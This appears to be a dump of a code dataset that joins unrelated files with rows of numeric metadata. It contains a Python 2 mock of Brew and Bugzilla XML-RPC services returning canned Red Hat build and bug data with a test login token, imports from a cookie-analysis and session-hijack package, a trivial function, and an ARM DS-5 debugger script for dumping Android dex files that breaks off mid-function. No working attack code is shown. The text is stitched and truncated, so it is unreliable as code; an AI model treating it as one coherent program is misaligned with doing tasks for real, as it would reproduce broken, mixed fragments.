response = "<?xml version='1.0' encoding='utf-8'?><methodResponse><params><param><value><array><data><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-pending</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5533</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-override</string></value></member><member><name>perm</name><value><string>trusted</string></value></member><member><name>id</name><value><int>5536</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><int>6</int></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-internal-compose-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6386</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-alpha-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6456</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-beta-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6572</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-1.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6658</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value><value><struct><member><name>maven_support</name><value><boolean>${isMaven}</boolean></value></member><member><name>locked</name><value><boolean>0</boolean></value></member><member><name>name</name><value><string>RHEL-6.6-snapshot-2.0-set</string></value></member><member><name>perm</name><value><nil/></value></member><member><name>id</name><value><int>6671</int></value></member><member><name>arches</name><value><nil/></value></member><member><name>maven_include_all</name><value><boolean>${isMaven}</boolean></value></member><member><name>perm_id</name><value><nil/></value></member></struct></value></data></array></value></param></params></methodResponse>"
response = response.replace('${isMaven}', isMaven);
return response
@staticmethod
def listArchives(request):
global paramSettings
type = xmlrpclib.loads(request)[0][4]
if(paramSettings==None):
paramSettings=(({'build_type': 'maven'},),'setParams')
if (paramSettings.has_key('build_type')):
if (type.count('maven') >0 and paramSettings.get('build_type').count('maven')>0):
return BrewHubMock.listArchives_maven(request)
elif (type.count('image') >0 and paramSettings.get('build_type').count('image')>0):
return BrewHubMock.listArchives_image(request)
elif (type.count('win') >0 and paramSettings.get('build_type').count('win')>0):
return BrewHubMock.listArchives_win(request)
return BrewHubMock.respondNone(request)
# if type is NON-RPM packges, image
@staticmethod
def listArchives_image(request):
archs= ["s390x","s390x","s390x","i686","i686","i686","ppc64","ppc64","ppc64","x86_64","x86_64","x86_64","s390","s390","s390","ppc","noarch","ppc","ppc","src"]
pckgs = ["libwacom-debuginfo","libwacom-devel","libwacom","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-debuginfo","libwacom","libwacom-devel","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-devel","libwacom","libwacom-debuginfo","libwacom-data","libwacom","libwacom-devel","libwacom"]
# buildRoot = [1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,1,0,0,0,0]
dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
num = 1
numstr = dynData['name'][1:2]
if (numstr.isdigit()):
num = int (numstr)
for k in range(num * 20):
global buildroot_id
global nvr_id
i = k % 20
p = k / 20
pckg = prix[p]+ pckgs[i]
payloadhash = str(uuid.uuid1()).replace('-','')
# buildroot_id = buildroot_id + buildRoot[i]
nvr_id = nvr_id +1
dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",str(dynData.get("id")),
"</int></value></member><member><name>type_description</name><value><string>XML file</string></value></member><member><name>type_id</name><value><int>5</int></value></member><member><name>checksum</name><value><string>",
payloadhash,"</string></value></member><member><name>type_name</name><value><string>xml</string></value></member><member><name>filename</name><value><string>",
pckg,"-",dynData['version'],"-",dynData['release'],"</string></value></member><member><name>arch</name><value><string>",
archs[i],"</string></value></member><member><name>type_extensions</name><value><string>xml</string></value></member><member><name>checksum_type</name><value><int>0</int></value></member><member><name>buildroot_id</name><value><nil/></value></member><member><name>id</name><value><int>",
str(nvr_id),"</int></value></member><member><name>size</name><value><int>641</int></value></member></struct></value>"])
response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
response = response.replace('libwacom', dynData['name']);
return response
#if type is NON-RPM packges, maven
@staticmethod
def listArchives_maven(request):
artifact_ids = ["jboss-eap-parent","com.jboss.eap","jboss-eap-parent","jboss-eap","jboss-eap",
"jboss-eap","jboss-eap","jboss-eap","jboss-eap-a","jboss-eap-b","jboss-eap-c","jboss-eap-d",
"jboss-eap-e","jboss-eap-f","jboss-eap-g","jboss-eap-h","jboss-eap-i","jboss-eap-j","jboss-eap-k","jboss-eap-build"]
prexNames = ['-sources.zip','-patches.zip','.pom','-src.tar.gz','.tar.gz','.pom','.zip','.tar.gz','.tar.gz',
'.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.tar.gz','.pom']
buildRoot = [1,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0]
dataBlock = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><array><data>"
prix = ['','aa', 'bb', 'cc','dd','ee','ff','gg']
num = 1
numstr = dynData['name'][1:2]
if (numstr.isdigit()):
num = int (numstr)
for k in range(num * 20):
global buildroot_id
global nvr_id
i = k % 20
p = k / 20
artifact_id = prix[p]+ artifact_ids[i]
payloadhash = str(uuid.uuid1()).replace('-','')
buildroot_id = buildroot_id + buildRoot[i]
filename = ''.join([artifact_id,"-",dynData.get("version"),prexNames[i]])
nvr_id = nvr_id +1
dataBlock = "".join([dataBlock,"<value><struct><member><name>build_id</name><value><int>",
str(dynData.get("id")),"</int></value></member><member><name>type_description</name><value><string>Jar file</string></value></member><member><name>artifact_id</name><value><string>",
artifact_id,"</string></value></member><member><name>type_id</name><value><int>2</int></value></member><member><name>checksum</name><value><string>",
payloadhash,"</string></value></member><member><name>type_name</name><value><string>zip</string></value></member><member><name>filename</name><value><string>",
filename,"</string></value></member><member><name>version</name><value><string>",
dynData.get("version"),"</string></value></member><member><name>type_extensions</name><value><string>zip</string></value></member><member><name>checksum_type</name><value><int>0</int></value></member><member><name>group_id</name><value><string>com.jboss.eap</string></value></member><member><name>buildroot_id</name><value><int>",
str(buildroot_id),"</int></value></member><member><name>id</name><value><int>",str(nvr_id),"</int></value></member><member><name>size</name><value><int>89428632</int></value></member></struct></value>"])
response = "".join([dataBlock,'</data></array></value></param></params></methodResponse>'])
response = response.replace('com.jboss.eap', dynData['name']);
return response
#if type is NON-RPM packges, win
@staticmethod
def listArchives_win(request):
return BrewHubMock.respondNone(request)
#return nothing
@staticmethod
def respondNone(request):
response = "<?xml version='1.0'?><methodResponse><params><param><value><array><data></data></array></value></param></params></methodResponse>"
return response
#only for setting some parameters
@staticmethod
def setParams(request):
global paramSettings;
requestRPC = xmlrpclib.loads(request)
paramSettings = requestRPC[0][0]
return request
class BugzillaMock():
global bugid, bugid_init # bugid
global compid # component id which is related to bugid
global flagid # flag id
global component_id
global component_id_id
global release
global product
global releaseCompNum
bugid = 1210000
compid = 1
flagid=2010000
#bugid = 1220000
#compid = 1000
#flagid = 2010000 + 20000*4
component_id=144320
component_id_id = 810000
release = "rhel-7.1.0"
product = "Red Hat Enterprise Linux 7"
bugid_init = bugid
releaseCompNum = 1500
@staticmethod
def callMethod(requestData,methodName):
methodName = methodName.replace('.','_')
return getattr(BugzillaMock, methodName)(requestData)
@staticmethod
def User_login(request):
response = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse><params><param><value><struct><member><name>id</name><value><int>241731</int></value></member><member><name>token</name><value><string>241731-Pqde868rmU</string></value></member></struct></value></param></params></methodResponse>"
return response
@staticmethod
def Bug_get1(request):
global bugid # bugid
global compid # component id which is related to bugid
global flagid # flag id
global component_id
global component_id_id
global release
component= "testcomponent_" + str(compid + ((int)(bugid-1200000))/10)
response = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data><value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>MODIFIED</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>"+ str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value></data></array></value></member></struct></value></param></params></methodResponse>"
response = response.replace('${bugid}', str(bugid));
response = response.replace('${component}', component);
response = response.replace('${release}', release);
bugid = bugid +1
flagid = flagid + 1
return response
@staticmethod
def Bug_get2(request):
prebody = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data>"
body = ""
endbody = "</data></array></value></member></struct></value></param></params></methodResponse>"
for i in range(100):
global bugid # bugid
global compid # component id which is related to bugid
global flagid # flag id
global component_id
global component_id_id
global release
part = "<value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>NEW</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>"+ str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value>"
component= "testcomponent_" + str(compid + ((int)(bugid-1210000))/10)
body = body.replace('${bugid}', str(bugid));
body = body.replace('${component}', component);
body = body.replace('${release}', release);
body = "".join([body, part])
bugid = bugid +1
flagid = flagid + 1
response = prebody + body + endbody
return response
#each component contain 20 bugs, 10 eligible and 10 ineligible bugs
@staticmethod
def Bug_get(request):
prebody = "<?xml version=\"1.0\" encoding=\"utf-8\"?><methodResponse><params><param><value><struct><member><name>faults</name><value><array><data/></array></value></member><member><name>bugs</name><value><array><data>"
body = ""
endbody = "</data></array></value></member></struct></value></param></params></methodResponse>"
for i in range(100):
global bugid,bugid_init # bugid
global compid # component id which is related to bugid
global flagid # flag id
global release
#first 10 are eligible bugs and following 10 are ineligible bugs
status = 'MODIFIED'
if(i%20 >= 10):
status = 'NEW'
part = "<value><struct><member><name>priority</name><value><string>low</string></value></member><member><name>status</name><value><string>"+status+ "</string></value></member><member><name>last_change_time</name><value><dateTime.iso8601>20140822T15:40:36</dateTime.iso8601></value></member><member><name>keywords</name><value><array><data/></array></value></member><member><name>cf_qa_whiteboard</name><value><string/></value></member><member><name>summary</name><value><string>bug_${component}_1408722027952</string></value></member><member><name>groups</name><value><array><data/></array></value></member><member><name>id</name><value><int>${bugid}</int></value></member><member><name>severity</name><value><string>low</string></value></member><member><name>flags</name><value><array><data><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>245</int></value></member><member><name>name</name><value><string>${release}</string></value></member><member><name>id</name><value><int>"+ str(flagid) + "</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>11</int></value></member><member><name>name</name><value><string>pm_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>10</int></value></member><member><name>name</name><value><string>devel_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value><value><struct><member><name>modification_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>is_active</name><value><int>1</int></value></member><member><name>creation_date</name><value><dateTime.iso8601>20140822T15:40:29</dateTime.iso8601></value></member><member><name>status</name><value><string>+</string></value></member><member><name>type_id</name><value><int>9</int></value></member><member><name>name</name><value><string>qa_ack</string></value></member><member><name>id</name><value><int>"+str(flagid+1)+"</int></value></member><member><name>setter</name><value><string>zxiong@redhat.com</string></value></member></struct></value></data></array></value></member><member><name>cf_pm_score</name><value><string>0</string></value></member><member><name>component</name><value><array><data><value><string>${component}</string></value></data></array></value></member><member><name>classification</name><value><string>Red Hat</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>cf_release_notes</name><value><string/></value></member><member><name>cf_verified</name><value><array><data/></array></value></member><member><name>alias</name><value><array><data/></array></value></member></struct></value>"
component= "testcomponent_" + str(compid + ((int)(bugid-bugid_init))/20)
body = body.replace('${bugid}', str(bugid));
body = body.replace('${component}', component);
body = body.replace('${release}', release);
body = "".join([body, part])
bugid = bugid +1
flagid = flagid + 1
response = prebody + body + endbody
return response
#syn with errata tool, this is only changes rhel7.1.0 ACL
@staticmethod
def Releases_getReleaseComponents(request):
global releaseCompNum
releaseCompNum = releaseCompNum + 500
compid = 1
component_id = 144320
component_id_id = 810000
prebody_all = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><methodResponse><params><param><value><struct>"
endbody_all = "</struct></value></param></params></methodResponse>"
print releaseCompNum
body = ""
for k in range(releaseCompNum):
#global compid,component_id,component_id_id
component= "testcomponent_" + str(compid)
part1 = "".join(["<value><struct><member><name>initialowner</name><value><string>zxiong@redhat.com</string></value></member><member><name>name</name><value><string>",component,"</string></value></member><member><name>type</name><value><string>approved</string></value></member><member><name>product</name><value><string>Red Hat Enterprise Linux 7</string></value></member><member><name>component_id</name><value><int>",str(component_id),"</int></value></member><member><name>id</name><value><int>",str(component_id_id),"</int></value></member><member><name>initialqacontact</name><value><string>zxiong@redhat.com</string></value></member></struct></value>"])
component_id = component_id + 1
component_id_id = component_id_id + 1
compid = compid +1
body = "".join([body,part1])
prebody1 = "<member><name>nack</name><value><array><data>"
prebody2 = "<member><name>approved</name><value><array><data>"
prebody3 = "<member><name>ack</name><value><array><data>"
endbody = "</data></array></value></member>"
allbody = prebody1 + body +endbody + prebody2 + body +endbody +prebody3 + body +endbody + "<member><name>capacity</name><value><array><data/></array></value></member>"
response = prebody_all + allbody + endbody_all
return response
@staticmethod
def resetReleaseComponentNum(request):
global releaseCompNum
requestRPC = xmlrpclib.loads(request)
releaseCompNum = int(requestRPC[0][0])
return "The number of Components: " + str(releaseCompNum)
| 124.805944
| 4,514
| 0.65017
| 9,168
| 71,389
| 5.014834
| 0.041558
| 0.113538
| 0.15308
| 0.189099
| 0.904298
| 0.891226
| 0.88096
| 0.869584
| 0.85984
| 0.852249
| 0
| 0.037151
| 0.100744
| 71,389
| 571
| 4,515
| 125.024518
| 0.679019
| 0.073555
| 0
| 0.607059
| 0
| 0.141176
| 0.739834
| 0.690851
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.011765
| null | null | 0.004706
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
f1a79661dfa55b1e78cf665533a48bb94e7fea21
| 71
|
py
|
Python
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | 2
|
2020-01-13T13:51:33.000Z
|
2020-01-17T21:58:10.000Z
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | 3
|
2020-01-09T19:25:22.000Z
|
2020-01-13T16:06:45.000Z
|
CookieAnalysis/__init__.py
|
D-E-F-E-A-T/Cookie-Analyzer-and-Session-Hijack
|
97a1ce1c56c3962f57754c60d46a75fe68715c54
|
[
"MIT"
] | null | null | null |
from CookieAnalysis import wrapper
from CookieAnalysis import analysis
| 23.666667
| 35
| 0.887324
| 8
| 71
| 7.875
| 0.625
| 0.571429
| 0.761905
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 36
| 35.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9e67bdd291cb5489e20c59abc6e700021abd2ddc
| 25
|
py
|
Python
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/import/pkg/mod.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
def foo():
return 42
| 8.333333
| 13
| 0.56
| 4
| 25
| 3.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.32
| 25
| 2
| 14
| 12.5
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
9e98ec501774bc3f6687aeee4783da403eaeafa0
| 36,258
|
py
|
Python
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 32
|
2021-04-08T05:39:51.000Z
|
2022-03-31T03:49:35.000Z
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 2
|
2021-04-14T08:31:30.000Z
|
2021-08-29T19:12:09.000Z
|
ds5-scripts/aosp_8_1/arm/entrypoint.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 3
|
2021-06-08T08:52:56.000Z
|
2021-06-23T17:28:51.000Z
|
# DexFile.py is used to dump the dex file when the "DexFile::<init>" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
# define the analyzing configuration related to online tracing module
def online_tracing(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_clear_cache_cmd)
# brk_mmap_cmd = "hbreak" + " " + str(hex(config.brk_mmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_mmap_cmd)
# brk_munmap_cmd = "hbreak" + " " + str(hex(config.brk_munmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_munmap_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
execution_state.executeDSCommand(bs_clear_cache_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_mmap:
# bs_mmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.mmap_script)
# execution_state.executeDSCommand(bs_mmap_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_munmap:
# bs_munmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.munmap_script)
# execution_state.executeDSCommand(bs_munmap_cmd)
# brk_object.enable()
# define the analyzing configuration related to the DexFile loading
def dex_setup(pid):
# define the breakpoints
brk_DexFile_cmd = "hbreak" + " " + str(hex(config.brk_DexFile)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DexFile_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile:
bs_DexFile_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DexFile_script)
execution_state.executeDSCommand(bs_DexFile_cmd)
brk_object.enable()
# define the analyzing configuration related to the Java execution flow
def je_setup(pid):
# define the breakpoints
